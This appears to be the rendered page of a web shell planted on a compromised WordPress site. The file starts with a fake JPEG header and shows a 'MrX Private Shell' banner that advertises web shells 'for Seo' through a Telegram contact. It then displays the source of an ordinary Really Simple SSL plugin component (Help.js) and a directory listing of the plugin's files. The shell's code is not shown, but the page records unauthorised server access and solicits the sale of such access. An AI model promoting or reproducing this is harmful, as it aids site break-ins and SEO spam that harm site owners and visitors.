����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import {Component, Fragment} from "@wordpress/element";
import Icon from "../utils/Icon";
import { __ } from '@wordpress/i18n';
/**
* Render a help notice in the sidebar
*/
class Help extends Component {
render(){
let notice = this.props.help;
if ( !notice.title ){
notice.title = notice.text;
notice.text = false;
}
let openStatus = this.props.noticesExpanded ? 'open' : '';
//we can use notice.linked_field to create a visual link to the field.
let target = notice.url && notice.url.indexOf("really-simple-ssl.com") !==-1 ? "_blank" : '_self';
return (
<Fragment>
{ notice.title && notice.text &&
<details className={"rsssl-wizard-help-notice rsssl-" + notice.label.toLowerCase()} open={openStatus}>
<summary>{notice.title} <Icon name='chevron-down' /></summary>
{/*some notices contain html, like for the htaccess notices. A title is required for those options, otherwise the text becomes the title. */}
<div dangerouslySetInnerHTML={{__html:notice.text}}></div>
{notice.url && <div className="rsssl-help-more-info"><a target={target} href={notice.url}>{__("More info", "really-simple-ssl")}</a></div>}
</details>
}
{ notice.title && !notice.text &&
<div className={"rsssl-wizard-help-notice rsssl-" + notice.label.toLowerCase()}><p>{notice.title}</p></div>
}
</Fragment>
);
}
}
export default Help| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ChangeStatus.js | File | 702 B | 0644 |
|
| Field.js | File | 13.04 KB | 0644 |
|
| Help.js | File | 1.61 KB | 0644 |
|
| Host.js | File | 1.71 KB | 0644 |
|
| LearningMode.js | File | 13.74 KB | 0644 |
|
| License.js | File | 5.17 KB | 0644 |
|
| MixedContentScan.js | File | 11.42 KB | 0644 |
|
| Notices.js | File | 782 B | 0644 |
|
| Password.js | File | 1.32 KB | 0644 |
|
| PermissionsPolicy.js | File | 6.12 KB | 0644 |
|
| Settings.js | File | 7.58 KB | 0644 |
|
| SettingsGroup.js | File | 7.35 KB | 0644 |
|
| SettingsPage.js | File | 14.22 KB | 0644 |
|
| Support.js | File | 2.44 KB | 0644 |
|